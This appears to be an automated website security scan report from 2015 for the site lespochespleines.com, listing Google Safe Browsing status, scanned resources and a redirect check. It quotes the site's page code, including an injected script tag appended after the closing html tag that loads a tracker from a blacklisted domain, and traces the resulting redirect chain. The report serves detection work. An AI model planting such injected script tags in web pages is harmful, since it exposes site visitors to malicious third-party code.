Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lespochespleines.com
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.lespochespleines.com/ | 200 OK Content-Length: 37349 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: segurosadsuar.com ...[4099 bytes skipped]... tion() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </body> </html> <script type="text/javascript" src="http://segurosadsuar.com/trkxcygh.php?id=8471009"></script> | ||
http://www.lespochespleines.com/system/other/javascript/prototype.js | 200 OK Content-Length: 139927 Content-Type: application/javascript | clean |
http://www.lespochespleines.com/system/other/javascript/exterieur.js | 200 OK Content-Length: 543 Content-Type: application/javascript | clean |
http://s7.addthis.com/js/250/addthis_widget.js | 200 OK Content-Length: 10689 Content-Type: text/javascript | clean |
http://www.google.fr/cse/brand?form=cse-search-box&lang=fr | 200 OK Content-Length: 2502 Content-Type: text/javascript | clean |
http://segurosadsuar.com/trkxcygh.php?id=8471009 | HTTP/1.1 302 Found Connection: close Date: Fri, 30 Jan 2015 03:56:33 GMT Location: http://localhost/ Server: Apache Content-Type: text/html X-SERVER: 102 | clean |
http://localhost/ | 200 OK Content-Length: 3883 Content-Type: text/html | clean |
http://localhost/terms.html | 200 OK Content-Length: 12789 Content-Type: text/html | clean |
http://localhost/privacy.html | 200 OK Content-Length: 13339 Content-Type: text/html | clean |
http://localhost/test404page.js | HTTP/1.1 302 Found Connection: close Date: Fri, 30 Jan 2015 03:56:09 GMT Location: http://sameid.net/limit.html Server: Apache/2.4.6 (Ubuntu) Content-Length: 212 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: uri=%2Ftest404page%2Ejs;Path=/;Max-Age=31536000 Set-Cookie: ref=direct;Path=/;Max-Age=31536000 | clean |
http://sameid.net/limit.html | 200 OK Content-Length: 5242 Content-Type: text/html | clean |
http://sameid.net/ | 200 OK Content-Length: 3883 Content-Type: text/html | clean |
http://sameid.net/terms.html | 200 OK Content-Length: 12789 Content-Type: text/html | clean |
http://sameid.net/privacy.html | 200 OK Content-Length: 13339 Content-Type: text/html | clean |
http://sameid.net/test404page.js | 404 Not Found Content-Length: 3296 Content-Type: text/html | clean |
http://localhost/order?plan=pp-oneday | HTTP/1.1 302 Found Connection: close Date: Fri, 30 Jan 2015 03:56:15 GMT Location: https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=iiveras.lt%40gmail.com&amount=9.99&no_note=1&custom=-1000-no-1-05646eca&no_shipping=1&return=http%3A%2F%2Fsameid.net%2Fthankyou&rm=2&item_name=SameID%20One%20Day%20Access%20-%201000%20requests Server: Apache/2.4.6 (Ubuntu) Content-Length: 467 Content-Type: text/html; charset=iso-8859-1 | clean |
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=iiveras.lt%40gmail.com&amount=9.99&no_note=1&custom=-1000-no-1-05646eca&no_shipping=1&return=http%3a%2f%2fsameid.net%2fthankyou&rm=2&item_name=sameid%20one%20day%20access%20-%201000%20requests | HTTP/1.1 302 Moved Temporarily Connection: close Connection: Transfer-Encoding Date: Fri, 30 Jan 2015 03:56:42 GMT Location: https://www.paypal.com/lt/cgi-bin/webscr?cmd=_flow&SESSION=SXcon3Z-aXpEVJ-PrW9vadw2Ju_GUhkEFleZd_zSdaWQjSnK-zMhUCKVEJO&dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b081987669d951670e57a34adba9dd19029ce5 Server: Apache Content-Encoding: gzip Content-Type: text/html DC: slc-b-origin-www-1.paypal.com Strict-Transport-Security: max-age=63072000 X-Frame-Options: SAMEORIGIN | clean |
https://www.paypal.com/lt/cgi-bin/webscr?cmd=_flow&session=sxcon3z-axpevj-prw9vadw2ju_guhkeflezd_zsdawqjsnk-zmhuckvejo&dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b081987669d951670e57a34adba9dd19029ce5 | 200 OK Content-Length: 14180 Content-Type: text/html | clean |
https://www.paypalobjects.com/WEBSCR-640-20150123-1/js/lib/min/global.js | 200 OK Content-Length: 61553 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lespochespleines.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: lespochespleines.com
Referer: http://www.google.com/search?q=lespochespleines.com
Result:
The result is similar to the first query. There are no suspicious redirects found.